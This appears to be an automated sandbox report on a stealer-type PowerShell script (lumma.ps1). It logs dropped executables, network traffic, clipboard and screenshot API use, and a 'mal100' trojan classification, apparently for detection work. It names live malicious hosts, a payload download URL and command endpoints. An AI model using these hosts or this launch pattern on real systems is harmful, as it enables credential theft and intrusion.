Source: powershell.exe, 00000000.00000002.1791490853.0000020111E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000000.00000002.1817017854.0000020120AF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1817017854.0000020120AF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1817017854.0000020120AF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1791490853.0000020110CA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1791490853.00000201122A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://druster-master.com
Source: powershell.exe, 00000000.00000002.1791490853.0000020110CA8000.00000004.00000800.00020000.00000000.sdmp, lumma.ps1	String found in binary or memory: https://druster-master.com/
Source: powershell.exe, 00000000.00000002.1791490853.0000020110CA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1791490853.00000201122A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://druster-master.com/gogolend1.zip
Source: powershell.exe, 00000000.00000002.1791490853.0000020110CA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1791490853.0000020112720000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1791490853.00000201121A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1791490853.000002011268A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co
Source: powershell.exe, 00000000.00000002.1791490853.0000020112720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co/
Source: powershell.exe, 00000000.00000002.1791490853.0000020110CA8000.00000004.00000800.00020000.00000000.sdmp, lumma.ps1	String found in binary or memory: https://iplogger.co/1EnxJ4
Source: powershell.exe, 00000000.00000002.1791490853.0000020110EEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.coX
Source: ronwod.exe, 00000002.00000002.1818460522.000000000152F000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1817746988.000000000152F000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000002.1818376641.0000000001503000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1803922298.0000000001535000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/
Source: ronwod.exe, 00000002.00000002.1818460522.000000000152F000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1817746988.000000000152F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/4/
Source: ronwod.exe, 00000002.00000002.1818460522.000000000151D000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000002.1818376641.00000000014E8000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000002.1818460522.000000000152F000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1817746988.000000000152F000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1817746988.0000000001518000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/api
Source: ronwod.exe, 00000002.00000002.1818460522.000000000151D000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1817746988.0000000001518000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/apiH
Source: ronwod.exe, 00000002.00000002.1818460522.000000000152F000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000002.00000003.1817746988.000000000152F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lackadausaz.click/apiZ9
Source: powershell.exe, 00000000.00000002.1817017854.0000020120AF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 104.21.64.85:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.167.249:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.198.222:443 -> 192.168.2.4:49732 version: TLS 1.2

Source: C:\ProgramData\extract\ronwod.exe

Code function: 2_2_014722E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_014722E0

Source: C:\ProgramData\extract\ronwod.exe

Code function: 2_2_014722E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_014722E0

Source: C:\ProgramData\extract\ronwod.exe

Code function: 2_2_01472AF4 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_01472AF4

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\extract\cr.dll			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\extract\ronwod.exe			Jump to dropped file

Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_6C523B00 NtProtectVirtualMemory,		2_2_6C523B00
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_6C524FC9 NtAllocateVirtualMemory,NtProtectVirtualMemory,		2_2_6C524FC9

Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_00A1346D	2_2_00A1346D
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_00A12A83	2_2_00A12A83
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0144A8B0	2_2_0144A8B0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01449C6F	2_2_01449C6F
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147B940	2_2_0147B940
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147F150	2_2_0147F150
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01454161	2_2_01454161
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01477960	2_2_01477960
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01458170	2_2_01458170
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01477170	2_2_01477170
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0145717B	2_2_0145717B
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01449100	2_2_01449100
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0145D900	2_2_0145D900
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147E920	2_2_0147E920
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01445930	2_2_01445930
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01459930	2_2_01459930
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147E9D0	2_2_0147E9D0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147B1D0	2_2_0147B1D0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014551A9	2_2_014551A9
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0144E9B0	2_2_0144E9B0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014461B0	2_2_014461B0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014669B0	2_2_014669B0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01464060	2_2_01464060
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147E820	2_2_0147E820
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0145602C	2_2_0145602C
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014590D1	2_2_014590D1
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0146C8D0	2_2_0146C8D0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014438F0	2_2_014438F0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014720B0	2_2_014720B0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147FB10	2_2_0147FB10
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0144EB3B	2_2_0144EB3B
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014773D0	2_2_014773D0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01444BE0	2_2_01444BE0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0145138A	2_2_0145138A
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0145E390	2_2_0145E390
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01450247	2_2_01450247
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0144B262	2_2_0144B262
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147EA60	2_2_0147EA60
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01455A72	2_2_01455A72
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0146F211	2_2_0146F211
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0146822F	2_2_0146822F
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014482C0	2_2_014482C0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01465ACF	2_2_01465ACF
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01465ACF	2_2_01465ACF
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01465A90	2_2_01465A90
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014442A0	2_2_014442A0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0145CAA0	2_2_0145CAA0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01467551	2_2_01467551
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01476569	2_2_01476569
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0146BD77	2_2_0146BD77
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01449570	2_2_01449570
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01461570	2_2_01461570
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01466520	2_2_01466520
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0144F529	2_2_0144F529
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0145DDC0	2_2_0145DDC0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0145ADD0	2_2_0145ADD0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0146F5D9	2_2_0146F5D9
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014685E1	2_2_014685E1
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01463C40	2_2_01463C40
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147F450	2_2_0147F450
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0146CC5D	2_2_0146CC5D
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01470470	2_2_01470470
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01447410	2_2_01447410
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01467C29	2_2_01467C29
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01477CF0	2_2_01477CF0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01450C83	2_2_01450C83
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0146B48C	2_2_0146B48C
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014564A3	2_2_014564A3
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01456777	2_2_01456777
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147E710	2_2_0147E710
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0145B729	2_2_0145B729
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01478FD9	2_2_01478FD9
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147F780	2_2_0147F780
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014577AD	2_2_014577AD
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01486FB1	2_2_01486FB1
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01446640	2_2_01446640
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01478E40	2_2_01478E40
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147B650	2_2_0147B650
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01471E50	2_2_01471E50
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0146CE60	2_2_0146CE60
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01463675	2_2_01463675
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0147DE19	2_2_0147DE19
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0144C621	2_2_0144C621
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01469630	2_2_01469630
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0146BE3B	2_2_0146BE3B
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01463EC0	2_2_01463EC0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014786C0	2_2_014786C0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01442ED0	2_2_01442ED0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_01475ED3	2_2_01475ED3
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0146DEF1	2_2_0146DEF1
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0146BE9D	2_2_0146BE9D
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_014516A0	2_2_014516A0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_0146C8D0	2_2_0146C8D0
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_6C5271D6	2_2_6C5271D6
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_6C526371	2_2_6C526371
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_6C523B00	2_2_6C523B00
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_6C524FC9	2_2_6C524FC9
Source: C:\ProgramData\extract\ronwod.exe	Code function: 2_2_6C523852	2_2_6C523852

Source: C:\ProgramData\extract\ronwod.exe	Code function: String function: 01447FA0 appears 46 times
Source: C:\ProgramData\extract\ronwod.exe	Code function: String function: 01453CD0 appears 74 times

Source: classification engine

Classification label: mal100.troj.evad.winPS1@4/10@3/3

Source: C:\ProgramData\extract\ronwod.exe

Code function: 2_2_01477CF0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

2_2_01477CF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppr24bc0.r13.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\extract\ronwod.exe "C:\ProgramData\extract\ronwod.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\extract\ronwod.exe "C:\ProgramData\extract\ronwod.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: wsdapi.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: cr.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: webservices.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\extract\ronwod.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\ProgramData\extract\ronwod.exe

Unpacked PE file: 2.2.ronwod.exe.1440000.1.unpack

Source: C:\ProgramData\extract\ronwod.exe

Code function: 2_2_00A114E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00A114E0

Source: ronwod.exe.0.dr

Static PE information: real checksum: 0xd10d should be: 0xd10c

Source: cr.dll.0.dr	Static PE information: section name: .eh_fram
Source: ronwod.exe.0.dr	Static PE information: section name: .eh_fram

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B8B7C2E pushad ; retf	0_2_00007FFD9B8B7C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B8B785E push eax; iretd	0_2_00007FFD9B8B786D
